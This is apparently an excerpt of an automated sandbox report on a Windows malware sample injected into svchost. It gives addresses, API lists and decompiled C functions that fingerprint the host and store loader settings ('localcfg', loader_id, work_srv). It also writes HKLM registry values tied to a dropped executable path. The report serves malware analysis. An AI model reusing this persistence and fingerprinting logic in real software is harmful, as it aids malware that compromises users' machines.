                                                                                                                                  0x02518538
                                                                                                                                  0x0251853e
                                                                                                                                  0x0251853f
                                                                                                                                  0x02518541
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02518541
                                                                                                                                  0x00000000
                                                                                                                                  0x0251835c
                                                                                                                                  0x0251836e
                                                                                                                                  0x02518373
                                                                                                                                  0x02518376
                                                                                                                                  0x02518378
                                                                                                                                  0x02518464
                                                                                                                                  0x02518464
                                                                                                                                  0x02518779
                                                                                                                                  0x00000000
                                                                                                                                  0x0251877a
                                                                                                                                  0x0251837e
                                                                                                                                  0x02518384
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251838a
                                                                                                                                  0x0251838d
                                                                                                                                  0x00000000
                                                                                                                                  0x02518393
                                                                                                                                  0x02518393
                                                                                                                                  0x02518399
                                                                                                                                  0x0251839c
                                                                                                                                  0x0251839c
                                                                                                                                  0x0251839e
                                                                                                                                  0x0251839f
                                                                                                                                  0x0251839f
                                                                                                                                  0x025183a5
                                                                                                                                  0x025183ac
                                                                                                                                  0x025183af
                                                                                                                                  0x025183b1
                                                                                                                                  0x025183b1
                                                                                                                                  0x025183b3
                                                                                                                                  0x025183ba
                                                                                                                                  0x02518450
                                                                                                                                  0x02518457
                                                                                                                                  0x0251845c
                                                                                                                                  0x025185c2
                                                                                                                                  0x025185c2
                                                                                                                                  0x025185c5
                                                                                                                                  0x025185c8
                                                                                                                                  0x025185ce
                                                                                                                                  0x02518615
                                                                                                                                  0x0251861a
                                                                                                                                  0x02518620
                                                                                                                                  0x025186a7
                                                                                                                                  0x025186a8
                                                                                                                                  0x025186ad
                                                                                                                                  0x025186ae
                                                                                                                                  0x025186b0
                                                                                                                                  0x02518762
                                                                                                                                  0x02518762
                                                                                                                                  0x02518768
                                                                                                                                  0x02518768
                                                                                                                                  0x0251876b
                                                                                                                                  0x02518770
                                                                                                                                  0x02518775
                                                                                                                                  0x02518778
                                                                                                                                  0x02518778
                                                                                                                                  0x00000000
                                                                                                                                  0x02518778
                                                                                                                                  0x025186b6
                                                                                                                                  0x025186bb
                                                                                                                                  0x025186bd
                                                                                                                                  0x0251875b
                                                                                                                                  0x0251875c
                                                                                                                                  0x00000000
                                                                                                                                  0x0251875c
                                                                                                                                  0x025186c5
                                                                                                                                  0x025186cc
                                                                                                                                  0x025186d8
                                                                                                                                  0x025186db
                                                                                                                                  0x025186eb
                                                                                                                                  0x025186f2
                                                                                                                                  0x025186ff
                                                                                                                                  0x02518705
                                                                                                                                  0x0251870d
                                                                                                                                  0x02518714
                                                                                                                                  0x02518733
                                                                                                                                  0x02518739
                                                                                                                                  0x0251873b
                                                                                                                                  0x0251874f
                                                                                                                                  0x02518755
                                                                                                                                  0x00000000
                                                                                                                                  0x0251875a
                                                                                                                                  0x02518746
                                                                                                                                  0x0251874b
                                                                                                                                  0x00000000
                                                                                                                                  0x0251874b
                                                                                                                                  0x0251862c
                                                                                                                                  0x02518633
                                                                                                                                  0x02518638
                                                                                                                                  0x02518639
                                                                                                                                  0x02518644
                                                                                                                                  0x02518647
                                                                                                                                  0x0251864a
                                                                                                                                  0x0251864c
                                                                                                                                  0x02518671
                                                                                                                                  0x02518683
                                                                                                                                  0x0251868c
                                                                                                                                  0x02518693
                                                                                                                                  0x0251869f
                                                                                                                                  0x025186a4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251864e
                                                                                                                                  0x0251864e
                                                                                                                                  0x0251864e
                                                                                                                                  0x02518657
                                                                                                                                  0x0251865d
                                                                                                                                  0x02518660
                                                                                                                                  0x02518663
                                                                                                                                  0x02518666
                                                                                                                                  0x0251866c
                                                                                                                                  0x0251866c
                                                                                                                                  0x00000000
                                                                                                                                  0x0251864e
                                                                                                                                  0x025185da
                                                                                                                                  0x025185df
                                                                                                                                  0x025185e2
                                                                                                                                  0x025185e5
                                                                                                                                  0x025185eb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025185ed
                                                                                                                                  0x025185ef
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025185f4
                                                                                                                                  0x025185fa
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02518601
                                                                                                                                  0x02518606
                                                                                                                                  0x02518609
                                                                                                                                  0x0251860f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251860f
                                                                                                                                  0x025183c2
                                                                                                                                  0x025183df
                                                                                                                                  0x025183e2
                                                                                                                                  0x025183e5
                                                                                                                                  0x025183ea
                                                                                                                                  0x025183f3
                                                                                                                                  0x025183f9
                                                                                                                                  0x025183fb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02518414
                                                                                                                                  0x0251841a
                                                                                                                                  0x0251841c
                                                                                                                                  0x0251842d
                                                                                                                                  0x0251843e
                                                                                                                                  0x02518441
                                                                                                                                  0x02518447
                                                                                                                                  0x0251844a
                                                                                                                                  0x00000000
                                                                                                                                  0x0251844a
                                                                                                                                  0x0251841e
                                                                                                                                  0x02518421
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02518423
                                                                                                                                  0x02518426
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02518428
                                                                                                                                  0x0251842b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251842b
                                                                                                                                  0x0251838d

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 025183F3
                                                                                                                                  • RegQueryValueExA.KERNEL32(02520750,?,00000000,?,02518893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 02518414
                                                                                                                                  • RegSetValueExA.KERNEL32(02520750,?,00000000,00000004,02518893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 02518441
                                                                                                                                  • RegCloseKey.ADVAPI32(02520750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0251844A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$CloseOpenQuery
                                                                                                                                  • String ID: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe$localcfg
                                                                                                                                  • API String ID: 237177642-493989863
                                                                                                                                  • Opcode ID: dfde7cea5dc4fb10f494acd6f07448a72d9c162f5ab5def14efead2c1cd88c01
                                                                                                                                  • Instruction ID: 495b15f63faf11b5693b718e0ff541e23172d4261278b8bc5f4629bc73e8309c
                                                                                                                                  • Opcode Fuzzy Hash: dfde7cea5dc4fb10f494acd6f07448a72d9c162f5ab5def14efead2c1cd88c01
                                                                                                                                  • Instruction Fuzzy Hash: 24C190B1D41109BEFB21AFA4DC89EEE7BBEFB45304F150465E905A2080EB705A589F28
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02511D96 Relevance: 31.7, APIs: 6, Strings: 12, Instructions: 205libraryloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                  			E02511D96(void* __ecx, intOrPtr* _a4) {
				struct _OSVERSIONINFOA _v156;
				struct _SYSTEM_INFO _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _t59;
				signed int _t61;
				signed int _t63;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				signed int _t71;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				intOrPtr* _t103;
				intOrPtr* _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;

				_t105 = _a4;
				_t102 = 0x64;
				E0251EE2A(__ecx, _t105, 0, _t102);
				_t109 =  &_v200 + 0xc;
				 *_t105 = _t102;
				_v156.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v156) == 0) {
					 *((char*)(_t105 + 0x41)) = 0;
				} else {
					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
				}
				GetSystemInfo( &_v192); // executed
				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
				_v196 = 0;
				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t103 != 0) {
					 *_t103(GetCurrentProcess(),  &_v196);
				}
				_t104 = "localcfg";
				 *((char*)(_t105 + 0x40)) = 2;
				_t59 = E0251E819(1, "localcfg", "lid_file_upd", 0);
				_t92 = "flags_upd";
				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
				 *(_t105 + 4) =  *(_t105 + 4) | E0251E819(1, "localcfg", "flags_upd", 0);
				_t61 =  *(_t105 + 4);
				_t110 = _t109 + 0x20;
				if((_t61 & 0x00000008) != 0) {
					 *(_t105 + 4) = _t61 & 0xfffffff7;
					E0251DF70(1, "work_srv");
					E0251DF70(1, "start_srv");
					_t110 = _t110 + 0x10;
				}
				E0251EA84(1, _t104, _t92, 0); // executed
				_t93 = 0;
				_t63 = E0251E819(1, _t104, "net_type", 0);
				_t111 = _t110 + 0x20;
				 *(_t105 + 0x14) = _t63;
				_t64 = E0251199C(_t63); // executed
				if(_t64 == 0) {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
				} else {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
				}
				_t65 = E0251E819(1, _t104, "born_date", _t93);
				_t112 = _t111 + 0x10;
				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
				if(_t65 == _t93) {
					_t97 = E0251F04E(_t93);
					E0251EA84(1, _t104, "born_date", _t97);
					_t112 = _t112 + 0x14;
					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
					_t93 = 0;
				}
				_t94 = "id";
				_t66 = E0251E819(1, _t104, "id", _t93);
				_t113 = _t112 + 0x10;
				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
				if(_t66 == 0) {
					_t77 = E02511B71(); // executed
					_v200 = _t77;
					E0251EA84(1, _t104, _t94, _t77);
					_t113 = _t113 + 0x10;
					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
				}
				_t95 = "hi_id";
				_t67 = E0251E819(1, _t104, "hi_id", 0);
				_t114 = _t113 + 0x10;
				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
				if(_t67 == 0) {
					_t74 = E02511BDF(); // executed
					_v200 = _t74;
					E0251EA84(1, _t104, _t95, _t74);
					_t114 = _t114 + 0x10;
					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
				}
				 *((intOrPtr*)(_t105 + 8)) = 0x5e;
				_t96 = E0251E819(1, _t104, "loader_id", 0);
				if(_t96 == 0) {
					_t96 = 0xd;
					E0251EA84(1, _t104, "loader_id", _t96);
				}
				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
				_t69 = E025130B5(); // executed
				 *((intOrPtr*)(_t105 + 0x34)) = _t69;
				if( *0x252201d == 0) {
					if( *0x252201f == 0) {
						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
					} else {
						if(E02516EC3() != 0) {
							 *(_t105 + 0x18) = 2;
						} else {
							 *(_t105 + 0x18) = 0x10;
						}
					}
				} else {
					 *(_t105 + 0x18) = 1;
				}
				if(_v196 != 0) {
					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
				}
				_t71 = GetTickCount() / 0x3e8;
				 *0x2522110 = _t71;
				 *(_t105 + 0x28) = _t71;
				return _t71;
			}






























                                                                                                                                  0x02511d9f
                                                                                                                                  0x02511da9
                                                                                                                                  0x02511daf
                                                                                                                                  0x02511db4
                                                                                                                                  0x02511dbc
                                                                                                                                  0x02511dbe
                                                                                                                                  0x02511dce
                                                                                                                                  0x02511de0
                                                                                                                                  0x02511dd0
                                                                                                                                  0x02511ddb
                                                                                                                                  0x02511ddb
                                                                                                                                  0x02511de8
                                                                                                                                  0x02511dfc
                                                                                                                                  0x02511dff
                                                                                                                                  0x02511e10
                                                                                                                                  0x02511e14
                                                                                                                                  0x02511e22
                                                                                                                                  0x02511e22
                                                                                                                                  0x02511e2a
                                                                                                                                  0x02511e34
                                                                                                                                  0x02511e38
                                                                                                                                  0x02511e3e
                                                                                                                                  0x02511e46
                                                                                                                                  0x02511e4e
                                                                                                                                  0x02511e51
                                                                                                                                  0x02511e54
                                                                                                                                  0x02511e59
                                                                                                                                  0x02511e64
                                                                                                                                  0x02511e67
                                                                                                                                  0x02511e72
                                                                                                                                  0x02511e77
                                                                                                                                  0x02511e77
                                                                                                                                  0x02511e7f
                                                                                                                                  0x02511e84
                                                                                                                                  0x02511e8e
                                                                                                                                  0x02511e93
                                                                                                                                  0x02511e96
                                                                                                                                  0x02511e99
                                                                                                                                  0x02511ea0
                                                                                                                                  0x02511ea8
                                                                                                                                  0x02511ea2
                                                                                                                                  0x02511ea2
                                                                                                                                  0x02511ea2
                                                                                                                                  0x02511eb4
                                                                                                                                  0x02511eb9
                                                                                                                                  0x02511ebc
                                                                                                                                  0x02511ec1
                                                                                                                                  0x02511ec9
                                                                                                                                  0x02511ed3
                                                                                                                                  0x02511ed8
                                                                                                                                  0x02511edb
                                                                                                                                  0x02511ede
                                                                                                                                  0x02511ede
                                                                                                                                  0x02511ee1
                                                                                                                                  0x02511ee9
                                                                                                                                  0x02511eee
                                                                                                                                  0x02511ef1
                                                                                                                                  0x02511ef6
                                                                                                                                  0x02511ef8
                                                                                                                                  0x02511f01
                                                                                                                                  0x02511f05
                                                                                                                                  0x02511f0e
                                                                                                                                  0x02511f11
                                                                                                                                  0x02511f11
                                                                                                                                  0x02511f16
                                                                                                                                  0x02511f1e
                                                                                                                                  0x02511f23
                                                                                                                                  0x02511f26
                                                                                                                                  0x02511f2b
                                                                                                                                  0x02511f2d
                                                                                                                                  0x02511f36
                                                                                                                                  0x02511f3a
                                                                                                                                  0x02511f43
                                                                                                                                  0x02511f46
                                                                                                                                  0x02511f46
                                                                                                                                  0x02511f52
                                                                                                                                  0x02511f5e
                                                                                                                                  0x02511f65
                                                                                                                                  0x02511f69
                                                                                                                                  0x02511f72
                                                                                                                                  0x02511f77
                                                                                                                                  0x02511f7a
                                                                                                                                  0x02511f7d
                                                                                                                                  0x02511f82
                                                                                                                                  0x02511f8c
                                                                                                                                  0x02511f9a
                                                                                                                                  0x02511fb7
                                                                                                                                  0x02511f9c
                                                                                                                                  0x02511fa3
                                                                                                                                  0x02511fae
                                                                                                                                  0x02511fa5
                                                                                                                                  0x02511fa5
                                                                                                                                  0x02511fa5
                                                                                                                                  0x02511fa3
                                                                                                                                  0x02511f8e
                                                                                                                                  0x02511f8e
                                                                                                                                  0x02511f8e
                                                                                                                                  0x02511fc0
                                                                                                                                  0x02511fc2
                                                                                                                                  0x02511fc2
                                                                                                                                  0x02511fd6
                                                                                                                                  0x02511fd9
                                                                                                                                  0x02511fde
                                                                                                                                  0x02511fea

                                                                                                                                  APIs
                                                                                                                                  • GetVersionExA.KERNEL32 ref: 02511DC6
                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 02511DE8
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 02511E03
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02511E0A
                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 02511E1B
                                                                                                                                  • GetTickCount.KERNEL32 ref: 02511FC9
                                                                                                                                    • Part of subcall function 02511BDF: GetComputerNameA.KERNEL32(?,0000000F), ref: 02511C15
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                                                                  • String ID: 0 v$IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                                                                  • API String ID: 4207808166-1853734742
                                                                                                                                  • Opcode ID: cb283fdf6d1a12678ddd208a51bda4aa710e08512e9b37845043da4566e6c605
                                                                                                                                  • Instruction ID: 82dd8c323ff4a729c40c6d4aa550310b19583d82717afe8859bebc8ecd1930f3
                                                                                                                                  • Opcode Fuzzy Hash: cb283fdf6d1a12678ddd208a51bda4aa710e08512e9b37845043da4566e6c605
                                                                                                                                  • Instruction Fuzzy Hash: 7E51A2B09057456FF330AF658C85F27BAECFBA5708F04495DA94A821C2D774A908CBAD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 025173FF Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 345registryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1000 25173ff-2517419 1001 251741b 1000->1001 1002 251741d-2517422 1000->1002 1001->1002 1003 2517424 1002->1003 1004 2517426-251742b 1002->1004 1003->1004 1005 2517430-2517435 1004->1005 1006 251742d 1004->1006 1007 2517437 1005->1007 1008 251743a-2517481 call 2516dc2 call 2512544 RegOpenKeyExA 1005->1008 1006->1005 1007->1008 1013 2517487-251749d call 251ee2a 1008->1013 1014 25177f9-25177fe call 251ee2a 1008->1014 1020 2517703-251770e RegEnumKeyA 1013->1020 1019 2517801 1014->1019 1021 2517804-2517808 1019->1021 1022 25174a2-25174b1 call 2516cad 1020->1022 1023 2517714-251771d RegCloseKey 1020->1023 1026 25174b7-25174cc call 251f1a5 1022->1026 1027 25176ed-2517700 1022->1027 1023->1019 1026->1027 1030 25174d2-25174f8 RegOpenKeyExA 1026->1030 1027->1020 1031 2517727-251772a 1030->1031 1032 25174fe-2517530 call 2512544 RegQueryValueExA 1030->1032 1033 2517755-2517764 call 251ee2a 1031->1033 1034 251772c-2517740 call 251ef00 1031->1034 1032->1031 1040 2517536-251753c 1032->1040 1045 25176df-25176e2 1033->1045 1042 2517742-2517745 RegCloseKey 1034->1042 1043 251774b-251774e 1034->1043 1044 251753f-2517544 1040->1044 1042->1043 1047 25177ec-25177f7 RegCloseKey 1043->1047 1044->1044 1046 2517546-251754b 1044->1046 1045->1027 1048 25176e4-25176e7 RegCloseKey 1045->1048 1046->1033 1049 2517551-251756b call 251ee95 1046->1049 1047->1021 1048->1027 1049->1033 1052 2517571-2517593 call 2512544 call 251ee95 1049->1052 1057 2517753 1052->1057 1058 2517599-25175a0 1052->1058 1057->1033 1059 25175a2-25175c6 call 251ef00 call 251ed03 1058->1059 1060 25175c8-25175d7 call 251ed03 1058->1060 1066 25175d8-25175da 1059->1066 1060->1066 1068 25175dc 1066->1068 1069 25175df-2517623 call 251ee95 call 2512544 call 251ee95 call 251ee2a 1066->1069 1068->1069 1078 2517626-251762b 1069->1078 1078->1078 1079 251762d-2517634 1078->1079 1080 2517637-251763c 1079->1080 1080->1080 1081 251763e-2517642 1080->1081 1082 2517644-2517656 call 251ed77 1081->1082 1083 251765c-2517673 call 251ed23 1081->1083 1082->1083 1088 2517769-251777c call 251ef00 1082->1088 1089 2517680 1083->1089 1090 2517675-251767e 1083->1090 1096 25177e3-25177e6 RegCloseKey 1088->1096 1092 2517683-251768e call 2516cad 1089->1092 1090->1092 1097 2517722-2517725 1092->1097 1098 2517694-25176bf call 251f1a5 call 2516c96 1092->1098 1096->1047 1099 25176dd 1097->1099 1104 25176c1-25176c7 1098->1104 1105 25176d8 1098->1105 1099->1045 1104->1105 1106 25176c9-25176d2 1104->1106 1105->1099 1106->1105 1107 251777e-2517797 GetFileAttributesExA 1106->1107 1108 2517799 1107->1108 1109 251779a-251779f 1107->1109 1108->1109 1110 25177a1 1109->1110 1111 25177a3-25177a8 1109->1111 1110->1111 1112 25177c4-25177c8 1111->1112 1113 25177aa-25177c0 call 251ee08 1111->1113 1115 25177d7-25177dc 1112->1115 1116 25177ca-25177d6 call 251ef00 1112->1116 1113->1112 1119 25177e0-25177e2 1115->1119 1120 25177de 1115->1120 1116->1115 1119->1096 1120->1119
                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                  			E025173FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
				CHAR* _v8;
				void* _v12;
				int _v16;
				void* _v20;
				int* _v24;
				char* _v28;
				intOrPtr _v32;
				int _v36;
				char _v295;
				char _v296;
				char _v556;
				void _v592;
				intOrPtr* _t85;
				int** _t86;
				char* _t87;
				char* _t88;
				char* _t91;
				long _t92;
				signed int _t93;
				long _t97;
				signed int _t103;
				long _t107;
				char* _t118;
				intOrPtr* _t119;
				CHAR* _t123;
				void* _t125;
				char* _t127;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr _t137;
				signed int* _t146;
				int** _t147;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				void* _t165;
				intOrPtr _t167;
				intOrPtr _t172;
				intOrPtr* _t173;
				void* _t186;
				intOrPtr _t187;
				int* _t188;
				void* _t190;
				void* _t191;
				char* _t192;
				signed int _t194;
				int* _t196;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;

				_t165 = __ecx;
				_t85 = _a8;
				_t188 = 0;
				_v16 = 0x104;
				if(_t85 != 0) {
					 *_t85 = 0;
				}
				_t86 = _a12;
				if(_t86 != _t188) {
					 *_t86 = _t188;
				}
				_t87 = _a16;
				if(_t87 != _t188) {
					 *_t87 = 0;
				}
				_t88 = _a20;
				if(_t88 != _t188) {
					 *_t88 = 0;
				}
				_v32 = E02516DC2(_t165);
				_t160 = 0xe4;
				_t91 = E02512544(0x25222f8, 0x25206e8, 0x22, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
				_push(0x100);
				_push(_t188);
				_push(0x25222f8);
				if(_t92 != 0) {
					_t93 = E0251EE2A(_t165);
					goto L66;
				} else {
					E0251EE2A(_t165);
					_t206 = _t204 + 0xc;
					_push(_v16);
					_push( &_v556);
					_v24 = _t188;
					_push(_t188);
					while(1) {
						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
						if(_t97 != 0) {
							break;
						}
						if(E02516CAD( &_v556) == 0) {
							L41:
							_v24 =  &(_v24[0]);
							_push(0x104);
							_v16 = 0x104;
							_push( &_v556);
							_push(_v24);
							continue;
						}
						_t103 = E0251F1A5( &_v556);
						_pop(_t167);
						if((_t103 ^ 0x5e5e5e5e) != _v32) {
							goto L41;
						}
						_v12 = _t188;
						_v16 = 0x104;
						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12); // executed
						if(_t107 != _t188) {
							L45:
							if(_t107 != 5) {
								L50:
								E0251EE2A(_t167, 0x25222f8, _t188, 0x100);
								_t206 = _t206 + 0xc;
								L39:
								if(_v12 != _t188) {
									RegCloseKey(_v12);
								}
								goto L41;
							}
							E0251EF00(_a16,  &_v556);
							if(_v12 != _t188) {
								RegCloseKey(_v12);
							}
							_push(4);
							_pop(0);
							L64:
							RegCloseKey(_v20);
							return 0;
						}
						_t118 = E02512544(0x25222f8, 0x25206dc, 0xa, _t160, 0xc8);
						_t206 = _t206 + 0x14;
						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16); // executed
						if(_t107 != _t188) {
							goto L45;
						}
						_t119 =  &_v556;
						_t186 = _t119 + 1;
						do {
							_t167 =  *_t119;
							_t119 = _t119 + 1;
						} while (_t167 != 0);
						if(_v16 <= _t119 - _t186) {
							goto L50;
						}
						_t123 = E0251EE95( &_v296,  &_v556);
						_pop(_t167);
						_v8 = _t123;
						if(_t123 == _t188) {
							goto L50;
						}
						_t125 = E0251EE95(_v8, E02512544(0x25222f8, 0x2520694, 5, _t160, 0xc8));
						_t206 = _t206 + 0x1c;
						if(_t125 == 0) {
							_t188 = 0;
							goto L50;
						}
						if(_v296 != 0x22) {
							_t127 = E0251ED03( &_v296, 0x20);
							_pop(_t167);
						} else {
							E0251EF00( &_v296,  &_v295);
							_t127 = E0251ED03( &_v296, 0x22);
							_t206 = _t206 + 0x10;
						}
						if(_t127 != 0) {
							 *_t127 = 0;
						}
						_v8 = E0251EE95( &_v296,  &_v556);
						_v28 = E0251EE95(_v8, E02512544(0x25222f8, 0x2520694, 5, _t160, 0xc8));
						E0251EE2A(_t167, 0x25222f8, 0, 0x100);
						_t134 = _a4;
						_t206 = _t206 + 0x30;
						_t190 = _t134 + 1;
						do {
							_t172 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t172 != 0);
						_t173 = _v8;
						_t191 = _t134 - _t190;
						_t43 = _t173 + 1; // 0x1
						_t136 = _t43;
						do {
							_t187 =  *_t173;
							_t173 = _t173 + 1;
						} while (_t187 != 0);
						_t174 = _t173 - _t136;
						if(_t191 <= _t173 - _t136 || E0251ED77(_t191 - _t174 + _a4, _v8) != 0) {
							_t192 = _v28;
							 *_t192 = 0;
							_t137 = E0251ED23(_v8, 0x5c);
							_v8 = _t137;
							if(_t137 != 0) {
								_v8 = _v8 + 1;
							} else {
								_v8 =  &_v296;
							}
							if(E02516CAD(_v8) == 0) {
								 *_t192 = 0x2e;
								goto L38;
							} else {
								_t194 = E0251F1A5(_v8) ^ 0x5e5e5e5e;
								_t163 = _t194 >> 0x00000008 & 0x000000ff;
								 *_v28 = 0x2e;
								if(E02516C96(_t194) != 0) {
									L37:
									_t160 = 0xe4;
									L38:
									_t188 = 0;
									goto L39;
								}
								_t56 = _t163 - 0x51; // -81
								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
									goto L37;
								} else {
									_t196 = 0;
									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
										_t196 = 1;
									}
									_t146 = _a8;
									if(_t146 != 0) {
										 *_t146 = _t163;
									}
									_t164 = _a16;
									if(_t164 != 0) {
										_t202 = _v8 -  &_v296;
										E0251EE08(_t164,  &_v296, _t202);
										 *((char*)(_t202 + _t164)) = 0;
									}
									if(_a20 != 0) {
										E0251EF00(_a20, _v8);
									}
									_t147 = _a12;
									if(_t147 != 0) {
										 *_t147 = _t196;
									}
									_push(3);
									_pop(0);
									goto L63;
								}
							}
						} else {
							E0251EF00(_a16,  &_v556);
							L63:
							RegCloseKey(_v12); // executed
							goto L64;
						}
					}
					_t93 = RegCloseKey(_v20);
					L66:
					return _t93 | 0xffffffff;
				}
			}






















































                                                                                                                                  0x025173ff
                                                                                                                                  0x02517408
                                                                                                                                  0x0251740e
                                                                                                                                  0x02517410
                                                                                                                                  0x02517419
                                                                                                                                  0x0251741b
                                                                                                                                  0x0251741b
                                                                                                                                  0x0251741d
                                                                                                                                  0x02517422
                                                                                                                                  0x02517424
                                                                                                                                  0x02517424
                                                                                                                                  0x02517426
                                                                                                                                  0x0251742b
                                                                                                                                  0x0251742d
                                                                                                                                  0x0251742d
                                                                                                                                  0x02517430
                                                                                                                                  0x02517435
                                                                                                                                  0x02517437
                                                                                                                                  0x02517437
                                                                                                                                  0x0251743f
                                                                                                                                  0x02517451
                                                                                                                                  0x02517464
                                                                                                                                  0x02517469
                                                                                                                                  0x02517472
                                                                                                                                  0x02517478
                                                                                                                                  0x0251747d
                                                                                                                                  0x0251747e
                                                                                                                                  0x02517481
                                                                                                                                  0x025177f9
                                                                                                                                  0x00000000
                                                                                                                                  0x02517487
                                                                                                                                  0x02517487
                                                                                                                                  0x0251748c
                                                                                                                                  0x0251748f
                                                                                                                                  0x02517498
                                                                                                                                  0x02517499
                                                                                                                                  0x0251749c
                                                                                                                                  0x02517703
                                                                                                                                  0x02517706
                                                                                                                                  0x0251770e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025174b1
                                                                                                                                  0x025176ed
                                                                                                                                  0x025176ed
                                                                                                                                  0x025176f5
                                                                                                                                  0x025176f6
                                                                                                                                  0x025176ff
                                                                                                                                  0x02517700
                                                                                                                                  0x00000000
                                                                                                                                  0x02517700
                                                                                                                                  0x025174be
                                                                                                                                  0x025174c8
                                                                                                                                  0x025174cc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025174e6
                                                                                                                                  0x025174e9
                                                                                                                                  0x025174f0
                                                                                                                                  0x025174f8
                                                                                                                                  0x02517727
                                                                                                                                  0x0251772a
                                                                                                                                  0x02517755
                                                                                                                                  0x0251775c
                                                                                                                                  0x02517761
                                                                                                                                  0x025176df
                                                                                                                                  0x025176e2
                                                                                                                                  0x025176e7
                                                                                                                                  0x025176e7
                                                                                                                                  0x00000000
                                                                                                                                  0x025176e2
                                                                                                                                  0x02517736
                                                                                                                                  0x02517740
                                                                                                                                  0x02517745
                                                                                                                                  0x02517745
                                                                                                                                  0x0251774b
                                                                                                                                  0x0251774d
